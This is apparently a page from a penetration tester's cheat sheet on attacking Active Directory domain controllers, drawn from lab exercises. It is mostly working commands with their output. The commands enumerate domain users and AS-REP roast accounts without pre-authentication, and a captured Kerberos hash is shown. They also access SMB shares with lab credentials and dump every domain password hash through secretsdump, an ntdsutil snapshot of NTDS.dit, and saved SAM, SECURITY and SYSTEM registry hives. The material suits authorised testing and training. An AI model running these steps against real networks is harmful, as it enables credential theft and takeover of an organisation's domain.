Domain Controllers

Basics

Find the NETBIOS Domain Name

nbtscan -v 10.10.8.1-254

Should also be in nmap output

3389/tcp  open  ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| rdp-ntlm-info: 
|   Target_Name: THM-AD
|   NetBIOS_Domain_Name: THM-AD
|   NetBIOS_Computer_Name: ATTACKTIVEDIREC
|   DNS_Domain_Name: spookysec.local
|   DNS_Computer_Name: AttacktiveDirectory.spookysec.local
|   DNS_Tree_Name: spookysec.local
|   Product_Version: 10.0.17763
|_  System_Time: 2021-08-20T18:00:52+00:00
| ssl-cert: Subject: commonName=AttacktiveDirectory.spookysec.local
| Issuer: commonName=AttacktiveDirectory.spookysec.local

Add to /etc/hosts

Kerbrute

Find valid users
Example Syntax

kerbrute -users userlist.txt -domain spookysec.local -dc-ip 10.10.55.114
Impacket v0.9.24.dev1+20210814.5640.358fc7c6 - Copyright 2021 SecureAuth Corporation

[*] Valid user => james
[*] Valid user => svc-admin [NOT PREAUTH]
[*] Valid user => James
[*] Valid user => robin
[*] Blocked/Disabled user => guest
[*] Valid user => darkstar

what a successful tool run looks like where no valid users are found

./kerbrute_linux_amd64 userenum --dc COMPANY.local -d COMPANY.local /home/ubuntu/Documents/htb/company/users.txt
2024/04/14 15:18:42 >  Done! Tested 6 usernames (0 valid) in 0.100 seconds

./kerbrute_linux_amd64 userenum --dc COMPANY.local -d COMPANY.local /usr/share/seclists/Usernames/top-usernames-shortlist.txt
2024/04/14 15:20:29 >  Done! Tested 17 usernames (0 valid) in 0.227 seconds

Impacket

Location:

/usr/share/doc/python3-impacket/examples/

If we have IPC$ access without authentication we are able to list the domain users as anonymous

python3 lookupsid.py [email protected] | tee users.txt

Isolate the users with SidTypeUser

grep SidTypeUser users.txt | awk '{print $2}' | cut -d "\\" -f2 > users.txt

Now, let’s use GetNPUsers.py to find users without Kerberos pre-authentication:

python3 GetNPUsers.py vulnnet-rst.local/ -no-pass -userfile usernames.txt

Should retrive a hash if the command is sucessful

[email protected]:692e76f70a8772c46ed94e73130460c8$713b0693498fdaff68642d78e713ca965e5007d5d864ca727289930783fe28f00bf79fef8126c4722d09cafc72ec60e940d31297591f67ce049030cb531ddd9c83cd37796fbf414b830a7c90fe26d2c45d6f2b624cd4413c58e3dbb77519dd69906248f8db27b1974b880a826003e562e25d9de9e4cb7cfa85c1de954761053b7d51a455530001348b46909f91f4e80bae7374071339f0920bb3e2ad95169d20f05d0cd586882facb63c058072dacb7ec8ddbcd9297331e1f6fb6d844ea7967659bee38fde4431af9f9608e9adcb38cb6e20e72bcf61c524f480b5ea2530e16dbeed2272855a61a05c03e84653aa1a3bbbd5ece06633

Crack the hash with john

SMB Samba authenticated access

smbclient -U vulnnet-rst.local/t-skid //10.10.100.15/NETLOGON
smbmap -u svc-admin -p management2005 -H 10.10.248.93
smbclient -U spookysec.local/svc-admin \\\\10.10.248.93\\backup

Cat out files with smb

Enter VULNNET-RST.LOCAL\t-skid's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Mar 17 00:15:49 2021
  ..                                  D        0  Wed Mar 17 00:15:49 2021
  ResetPassword.vbs                   A     2821  Wed Mar 17 00:18:14 2021

        8540159 blocks of size 4096. 4318542 blocks available
smb: \> get ResetPassword.vbs -

Dump hashes

Use secretsdump.py with impacket
This will allow us to retrieve all of the password hashes that this user account (that is synced with the domain controller) has to offer.
Creds used need to be domain admin for this to work

python3 secretsdump.py vulnnet-rst.local/a-whitehat:[email protected]
python3 secretsdump.py spookysec.local/backup:[email protected]
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

Alt Method

Open cmd.exe
Run ntdsutil from the command prompt, enter these commands

snapshot
activate instance NTDS
create

Takes a snapshot of the DC
Will show you the UUID of the newly created snapshot.
ntdsutil is using Volume Shadow Copy for the snapshot creation, but also ensures the database consistency. Use the UUID for the following command:

mount <UUID>

The output will show the path where the snapshot was mounted. Start another cmd.exe as Administrator and copy NTDS.dit (located in Windows\NTDS\NTDS.dit by default).
Create a copy of the SYSTEM registry hive:

reg.exe save HKLM\SYSTEM <path_where_you_want_to_save_it>

Go back to the cmd.exe window with ntdsutil running, and unmount (and optionally delete) the snapshot and exit:

unmount <UUID>
delete <UUID>
quit
quit

Using the two saved files (NTDS.dit and SYSTEM registry hive) you can use the same secretsdump.py script to extract password hashes offline (doesn’t need to be done on the domain controller):

secretsdump.py -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL

Secretsdump Local

Exfil the registry hives

reg.exe save hklm\security C:\temp\security.save
reg.exe save hklm\system C:\temp\system.save
reg.exe save hklm\SAM C:\temp\sam.save

Extract hashes from exfiled SECURITY SAM and SYSTEM

python3 secretsdump.py -security security.save -system system.save -sam sam.save LOCAL

Another Cheatsheet

https://gist.github.com/TarlogicSecurity/2f221924fef8c14a1d8e29f3cb5c5c4a

Invoke-ShareFinder

Invoke-ShareFinder  -Verbose
VERBOSE: [*] Running Invoke-ShareFinder with delay of 0
VERBOSE: [*] Querying domain rastalabs.local for hosts
VERBOSE: Get-DomainSearcher search string: LDAP://dc01.rastalabs.local/DC=rastalabs,DC=local
VERBOSE: Get-NetComputer filter : '(&(sAMAccountType=805306369)(dnshostname=*))'
VERBOSE: [*] Total number of hosts: 12
VERBOSE: Waiting for scanning threads to finish...
VERBOSE: All threads completed!
VERBOSE: [*] Total number of active hosts: 12
VERBOSE: [*] Enumerating server dc01.rastalabs.local (1 of 12)
\\dc01.rastalabs.local\ADMIN$   - Remote Admin
\\dc01.rastalabs.local\C$       - Default share
\\dc01.rastalabs.local\IPC$     - Remote IPC
\\dc01.rastalabs.local\NETLOGON         - Logon server share 
--snip--

PreviousKerberos cheatsheet NextOverpass The Hash/Pass The Key (PTK)

Last updated 1 year ago

hashtagBasics

hashtagKerbrute

hashtagImpacket

hashtagSMB Samba authenticated access

hashtagDump hashes

hashtagAlt Method

hashtagSecretsdump Local

hashtagAnother Cheatsheet

hashtagInvoke-ShareFinder

Basics

Kerbrute

Impacket

SMB Samba authenticated access

Dump hashes

Alt Method

Secretsdump Local

Another Cheatsheet

Invoke-ShareFinder